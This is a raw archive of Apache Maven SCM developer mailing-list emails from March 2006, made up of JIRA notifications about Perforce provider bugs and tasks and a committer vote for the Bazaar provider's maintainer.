PerforceChangeLogCommand needs to use the same clientspec as the update command > ------------------------------------------------------------------------------- > > Key: SCM-165 > URL: http://jira.codehaus.org/browse/SCM-165 > Project: Maven SCM > Type: Bug > Components: maven-scm-provider-perforce > Versions: 1.0 > Reporter: John Didion > Assignee: Mike Perham > Priority: Critical > Attachments: PerforceChangeLogCommand.diff, svn.diff > > > The PerforceChangeLogCommand as written does not work if the update was done with the client spec generated by the checkout/update command. The attached diff will fix the problem. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Mar 01 14:31:20 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98670 invoked from network); 1 Mar 2006 14:31:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 14:31:06 -0000 Received: (qmail 84048 invoked by uid 500); 1 Mar 2006 14:31:53 -0000 Delivered-To: [email protected] Received: (qmail 84032 invoked by uid 500); 1 Mar 2006 14:31:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 84021 invoked by uid 99); 1 Mar 2006 14:31:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:31:52 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=SUBJECT_ENCODED_TWICE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webifymail01.webify.local) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:31:52 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Subject: =?iso-8859-1?Q?RE=3A_=5Bvote=5D_Add_Torbj=F8rn_Sm=F8rgrav_as_Maven-SCM_co?= =?iso-8859-1?Q?mmitter?= Date: Wed, 1 Mar 2006 08:31:42 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: =?iso-8859-1?Q?=5Bvote=5D_Add_Torbj=F8rn_Sm=F8rgrav_as_Maven-SCM_committer?= Thread-Index: AcY9Lm5ECgJYHWxLQ16Mpddgg8NAEQADmISg From: "Mike Perham" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N +1=20 -----Original Message----- From: Emmanuel Venisse [mailto:[email protected]]=20 Sent: Wednesday, March 01, 2006 6:48 AM To: [email protected] Subject: [vote] Add Torbj=F8rn Sm=F8rgrav as Maven-SCM committer Hi I'd want to add Torbj=F8rn Sm=F8rgrav as Maven-SCM committer. He's the maintainer of bazaar scm provider and have done a good work on = it and TCK. He want to maintain it in next year (at least). Here my +1 Emmanuel From [email protected] Wed Mar 01 14:35:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3472 invoked from network); 1 Mar 2006 14:34:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 14:34:49 -0000 Received: (qmail 95103 invoked by uid 500); 1 Mar 2006 14:35:29 -0000 Delivered-To: [email protected] Received: (qmail 95050 invoked by uid 500); 1 Mar 2006 14:35:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 95039 invoked by uid 99); 1 Mar 2006 14:35:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:35:29 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:35:27 -0800 Received: (qmail 24785 invoked by uid 89); 1 Mar 2006 14:35:07 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 1 Mar 2006 14:35:07 -0000 Message-ID: <[email protected]> Date: Wed, 1 Mar 2006 08:35:07 -0600 (CST) From: "Mike Perham (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (SCM-155) Perforce instance for maven-scm testing and continuum testing In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-155?page=comments#action_59804 ] Mike Perham commented on SCM-155: --------------------------------- You can reassign to me when you want me to install and configure the server. > Perforce instance for maven-scm testing and continuum testing > ------------------------------------------------------------- > > Key: SCM-155 > URL: http://jira.codehaus.org/browse/SCM-155 > Project: Maven SCM > Type: Task > Components: maven-scm-provider-perforce > Reporter: Emmanuel Venisse > Assignee: Emmanuel Venisse > > > - Install somewhere an instance of Perforce accessible for all of us > - Add documentation about install/configuration > - Add documentation about what we need on local machine for use it -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Mar 01 14:35:22 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3486 invoked from network); 1 Mar 2006 14:34:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 14:34:51 -0000 Received: (qmail 95186 invoked by uid 500); 1 Mar 2006 14:35:30 -0000 Delivered-To: [email protected] Received: (qmail 95163 invoked by uid 500); 1 Mar 2006 14:35:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 95151 invoked by uid 99); 1 Mar 2006 14:35:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:35:30 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:35:27 -0800 Received: (qmail 24776 invoked by uid 89); 1 Mar 2006 14:35:06 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 1 Mar 2006 14:35:06 -0000 Message-ID: <[email protected]> Date: Wed, 1 Mar 2006 08:35:06 -0600 (CST) From: "Mike Perham (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (SCM-155) Perforce instance for maven-scm testing and continuum testing In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-155?page=all ] Mike Perham reassigned SCM-155: ------------------------------- Assign To: Emmanuel Venisse (was: Mike Perham) I sent you the contact info and legal stuff a week or two ago. I'm assuming you or another Apache person will handle the paperwork. > Perforce instance for maven-scm testing and continuum testing > ------------------------------------------------------------- > > Key: SCM-155 > URL: http://jira.codehaus.org/browse/SCM-155 > Project: Maven SCM > Type: Task > Components: maven-scm-provider-perforce > Reporter: Emmanuel Venisse > Assignee: Emmanuel Venisse > > > - Install somewhere an instance of Perforce accessible for all of us > - Add documentation about install/configuration > - Add documentation about what we need on local machine for use it -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Mar 01 14:41:34 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11498 invoked from network); 1 Mar 2006 14:41:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 14:41:33 -0000 Received: (qmail 7137 invoked by uid 500); 1 Mar 2006 14:42:20 -0000 Delivered-To: [email protected] Received: (qmail 7086 invoked by uid 500); 1 Mar 2006 14:42:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 7075 invoked by uid 99); 1 Mar 2006 14:42:20 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:42:20 -0800 X-ASF-Spam-Status: No, hits=3.8 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,FORGED_YAHOO_RCVD,SPF_HELO_PASS,SUBJECT_ENCODED_TWICE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO outbound.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:42:19 -0800 Received: from adsl-214-126-77.gnv.bellsouth.net ([161.129.204.104] helo=[161.129.204.104]) by outbound.mailhop.org with esmtpa (Exim 4.51) id 1FESWc-000NCz-LR for [email protected]; Wed, 01 Mar 2006 09:41:58 -0500 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: jdcasey Message-ID: <[email protected]> Date: Wed, 01 Mar 2006 09:44:56 -0500 From: John Casey <[email protected]> User-Agent: Thunderbird 1.5 (X11/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: [vote] Add =?ISO-8859-1?Q?Torbj=F8rn_Sm=F8rgrav_as_Mav?= =?ISO-8859-1?Q?en-SCM_committer?= References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N +1 Emmanuel Venisse wrote: > Hi > > I'd want to add Torbjørn Smørgrav as Maven-SCM committer. > He's the maintainer of bazaar scm provider and have done a good work on > it and TCK. > He want to maintain it in next year (at least). > > Here my +1 > > Emmanuel > > From [email protected] Wed Mar 01 14:48:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14982 invoked from network); 1 Mar 2006 14:48:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 14:48:43 -0000 Received: (qmail 21294 invoked by uid 500); 1 Mar 2006 14:49:29 -0000 Delivered-To: [email protected] Received: (qmail 21276 invoked by uid 500); 1 Mar 2006 14:49:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 21265 invoked by uid 99); 1 Mar 2006 14:49:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:49:29 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:49:28 -0800 Received: (qmail 24886 invoked by uid 89); 1 Mar 2006 14:49:08 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 1 Mar 2006 14:49:08 -0000 Message-ID: <[email protected]> Date: Wed, 1 Mar 2006 08:49:08 -0600 (CST) From: "Emmanuel Venisse (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (SCM-155) Perforce instance for maven-scm testing and continuum testing In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-155?page=comments#action_59805 ] Emmanuel Venisse commented on SCM-155: -------------------------------------- I have no time for the moment, i'll work on it after the release of maven-scm and continuum > Perforce instance for maven-scm testing and continuum testing > ------------------------------------------------------------- > > Key: SCM-155 > URL: http://jira.codehaus.org/browse/SCM-155 > Project: Maven SCM > Type: Task > Components: maven-scm-provider-perforce > Reporter: Emmanuel Venisse > Assignee: Emmanuel Venisse > > > - Install somewhere an instance of Perforce accessible for all of us > - Add documentation about install/configuration > - Add documentation about what we need on local machine for use it -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Mar 01 14:54:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17996 invoked from network); 1 Mar 2006 14:54:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 14:54:35 -0000 Received: (qmail 32033 invoked by uid 500); 1 Mar 2006 14:55:21 -0000 Delivered-To: [email protected] Received: (qmail 32015 invoked by uid 500); 1 Mar 2006 14:55:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 32004 invoked by uid 99); 1 Mar 2006 14:55:21 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:55:21 -0800 X-ASF-Spam-Status: No, hits=1.8 required=10.0 tests=HTML_MESSAGE,MAILTO_TO_SPAM_ADDR,SPF_PASS,SUBJECT_ENCODED_TWICE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 06:55:20 -0800 Received: by wproxy.gmail.com with SMTP id i27so150747wra for <[email protected]>; Wed, 01 Mar 2006 06:55:00 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=cICcc3NNN4f56KyIRfKqibmEo9FCPDR7++sIe+P3j+Sc22fqnisuHHqnQ5i6zhokw2aN08caTJX6nmoflguGagHbd6WSxGzZgwJJVOmUmNgVyj88NJc606dShL53BJC3aheMzWfxEEJrSQM0Ze1y5cBINUxz9Gp86PMhifyhWQc= Received: by 161.129.204.104 with SMTP id g19mr113346qbq; Wed, 01 Mar 2006 06:54:59 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 1 Mar 2006 06:54:59 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 1 Mar 2006 15:54:59 +0100 From: "Arnaud HERITIER" <[email protected]> To: [email protected] Subject: =?ISO-8859-1?Q?Re:_[vote]_Add_Torbj=F8rn_Sm=F8?= =?ISO-8859-1?Q?rgrav_as_Maven-SCM_committer?= In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_270_9969852.1141224899669" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_270_9969852.1141224899669 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline +1 Arnaud On 3/1/06, John Casey <[email protected]> wrote: > > +1 > > Emmanuel Venisse wrote: > > Hi > > > > I'd want to add Torbj=F8rn Sm=F8rgrav as Maven-SCM committer. > > He's the maintainer of bazaar scm provider and have done a good work on > > it and TCK. > > He want to maintain it in next year (at least). > > > > Here my +1 > > > > Emmanuel > > > > > ------=_Part_270_9969852.1141224899669 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <div>+1</div> <div>&nbsp;</div> <div>Arnaud<br><br>&nbsp;</div> <div><span class=3D"gmail_quote">On 3/1/06, <b class=3D"gmail_sendername">J= ohn Casey</b> &lt;<a href=3D"mailto:[email protected]">jdcasey1779@yaho= o.com</a>&gt; wrote:</span> <blockquote class=3D"gmail_quote" style=3D"PADDING-LEFT: 1ex; MARGIN: 0px 0= px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">+1<br><br>Emmanuel Venisse wrote= :<br>&gt; Hi<br>&gt;<br>&gt; I'd want to add Torbj=F8rn Sm=F8rgrav as Maven= -SCM committer. <br>&gt; He's the maintainer of bazaar scm provider and have done a good wo= rk on<br>&gt; it and TCK.<br>&gt; He want to maintain it in next year (at l= east).<br>&gt;<br>&gt; Here my +1<br>&gt;<br>&gt; Emmanuel<br>&gt;<br>&gt; <br></blockquote></div><br> ------=_Part_270_9969852.1141224899669-- From [email protected] Wed Mar 01 17:24:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6646 invoked from network); 1 Mar 2006 17:24:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Mar 2006 17:24:06 -0000 Received: (qmail 83760 invoked by uid 500); 1 Mar 2006 17:24:53 -0000 Delivered-To: [email protected] Received: (qmail 83721 invoked by uid 500); 1 Mar 2006 17:24:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 83710 invoked by uid 99); 1 Mar 2006 17:24:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 09:24:52 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=SUBJECT_ENCODED_TWICE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO trshare.triumf.ca) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Mar 2006 09:24:51 -0800 Received: from [161.129.204.104] ([161.129.204.104]) (authenticated bits=0) by trshare.triumf.ca (8.12.10/8.12.10) with ESMTP id k21HOSSU027833 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for <[email protected]>; Wed, 1 Mar 2006 09:24:30 -0800 Message-ID: <[email protected]> Date: Wed, 01 Mar 2006 17:24:56 +0000 From: Lukas Theussl <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Fedora/1.7.12-1.3.1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: [vote] Add =?ISO-8859-1?Q?Torbj=F8rn_Sm=F8rgrav_as_Mav?= =?ISO-8859-1?Q?en-SCM_committer?= References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N +1 Lukas Emmanuel Venisse wrote: > Hi > > I'd want to add Torbjørn Smørgrav as Maven-SCM committer. > He's the maintainer of bazaar scm provider and have done a good work on > it and TCK. > He want to maintain it in next year (at least). > > Here my +1 > > Emmanuel > From [email protected] Thu Mar 02 15:00:44 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17562 invoked from network); 2 Mar 2006 15:00:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Mar 2006 15:00:42 -0000 Received: (qmail 456 invoked by uid 500); 2 Mar 2006 15:01:26 -0000 Delivered-To: [email protected] Received: (qmail 99983 invoked by uid 500); 2 Mar 2006 15:01:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 99971 invoked by uid 99); 2 Mar 2006 15:01:23 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Mar 2006 07:01:23 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Mar 2006 07:01:23 -0800 Received: (qmail 32566 invoked by uid 89); 2 Mar 2006 15:01:02 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 2 Mar 2006 15:01:02 -0000 Message-ID: <[email protected]> Date: Thu, 2 Mar 2006 09:01:02 -0600 (CST) From: "Emmanuel Venisse (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (SCM-150) Start pure java cvs provider In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-150?page=all ] Emmanuel Venisse closed SCM-150: -------------------------------- Resolution: Fixed Done with changelog command > Start pure java cvs provider > ---------------------------- > > Key: SCM-150 > URL: http://jira.codehaus.org/browse/SCM-150 > Project: Maven SCM > Type: New Feature > Components: maven-scm-provider-cvs > Reporter: Emmanuel Venisse > Assignee: Emmanuel Venisse > Fix For: 1.0 > > > required by changelo plugin for backward compatibility -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Mar 02 15:04:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20668 invoked from network); 2 Mar 2006 15:04:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Mar 2006 15:04:38 -0000 Received: (qmail 14874 invoked by uid 500); 2 Mar 2006 15:05:24 -0000 Delivered-To: [email protected] Received: (qmail 14858 invoked by uid 500); 2 Mar 2006 15:05:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 14847 invoked by uid 99); 2 Mar 2006 15:05:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Mar 2006 07:05:24 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Mar 2006 07:05:22 -0800 Received: (qmail 32606 invoked by uid 89); 2 Mar 2006 15:05:02 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 2 Mar 2006 15:05:02 -0000 Message-ID: <[email protected]> Date: Thu, 2 Mar 2006 09:05:02 -0600 (CST) From: "Emmanuel Venisse (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (SCM-169) Add scm revision if available in project.properties MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Add scm revision if available in project.properties --------------------------------------------------- Key: SCM-169 URL: http://jira.codehaus.org/browse/SCM-169 Project: Maven SCM Type: Improvement Components: maven-plugin Versions: 1.0 Reporter: Emmanuel Venisse Fix For: 1.0 -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Mar 02 15:04:47 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20744 invoked from network); 2 Mar 2006 15:04:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Mar 2006 15:04:45 -0000 Received: (qmail 14994 invoked by uid 500); 2 Mar 2006 15:05:26 -0000 Delivered-To: [email protected] Received: (qmail 14970 invoked by uid 500); 2 Mar 2006 15:05:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 14948 invoked by uid 99); 2 Mar 2006 15:05:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Mar 2006 07:05:25 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO 63-246-20-114.contegix.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Mar 2006 07:05:23 -0800 Received: (qmail 32614 invoked by uid 89); 2 Mar 2006 15:05:02 -0000 Received: from unknown (HELO codehaus01.managed.contegix.com) (161.129.204.104) by smtp.domain.com with SMTP; 2 Mar 2006 15:05:02 -0000 Message-ID: <[email protected]> Date: Thu, 2 Mar 2006 09:05:02 -0600 (CST) From: "Emmanuel Venisse (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (SCM-169) Add scm revision if available in project.properties In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://jira.codehaus.org/browse/SCM-169?page=all ] Emmanuel Venisse closed SCM-169: -------------------------------- Assign To: Emmanuel Venisse Resolution: Fixed Fix Version: 1.0 Done in update mojo > Add scm revision if available in project.properties > --------------------------------------------------- > > Key: SCM-169 > URL: http://jira.codehaus.org/browse/SCM-169 > Project: Maven SCM > Type: Improvement > Components: maven-plugin > Versions: 1.0 > Reporter: Emmanuel Venisse > Assignee: Emmanuel Venisse > Fix For: 1.0 > > -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://jira.codehaus.org/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Mar 02 17:34:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21460 invoked from network); 2 Mar 2006 17:34:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Mar 2006 17:34:09 -0000 Received: (qmail 74904 invoked by uid 500); 2 Mar 2006 17:34:55 -0000 Delivered-To: [email protected] Received: (qmail 74886 invoked by uid 500); 2 Mar 2006 17:34:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 74870 invoked by uid 99); 2 Mar 